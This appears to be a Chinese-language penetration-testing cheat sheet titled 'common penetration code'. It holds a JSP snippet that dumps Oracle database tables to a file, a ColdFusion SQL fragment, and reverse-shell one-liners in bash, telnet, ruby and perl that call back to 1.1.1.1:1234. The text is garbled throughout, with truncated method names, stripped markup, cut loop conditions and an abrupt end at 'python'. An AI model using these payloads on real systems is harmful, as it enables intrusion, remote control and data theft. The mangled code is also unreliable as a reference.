渗透常用代码

2024年2月20日发(作者：)

for(int i=1;i

%>JSP2 <%@ page contentType="text/html;charset=UTF-8"%> <%@ page import=".*,.*,.*"%> <% e("Driver"); Connection conn = nection("jdbc:oracle:thin:@127.0.0.1:1521", "admin", "password"); Statement stmt=Statement(_SCROLL_SENSITIVE,_UPDATABLE); String html=""; File file = new File("/tmp/"); BufferedReader br = new BufferedReader(new FileReader(file)); String line; while ((line = ne()) != null) { html=html+"

"+line+":

"; ResultSet rs=eQuery("select * from "+line+" where rownum < 100"); ResultSetMetaData rsmd = aData(); int numberOfColumns = umnCount(); for(int i=1;i"+umnName(i)+""; } html+=""; while (()){ html+=""; for(int i=1;i"+ing(i)+""; } html+=""; } (); html+=""; } File f = new File("/tmp/"); BufferedWriter bw = new BufferedWriter(new FileWriter(f)); (html); (); (); (); (); %>

ColdFusion SELECT * FROM MEMBER 反弹shellbash bash -i >& /dev/tcp/1.1.1.1/1234 0>&1 rm -f /tmp/p; mknod /tmp/p p && telnet 1.1.1.1 1234 0/tmp/pruby ruby -rsocket -e'f=("1.1.1.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'perl perl -e 'use Socket;$i="1.1.1.1"; $p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")) if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'python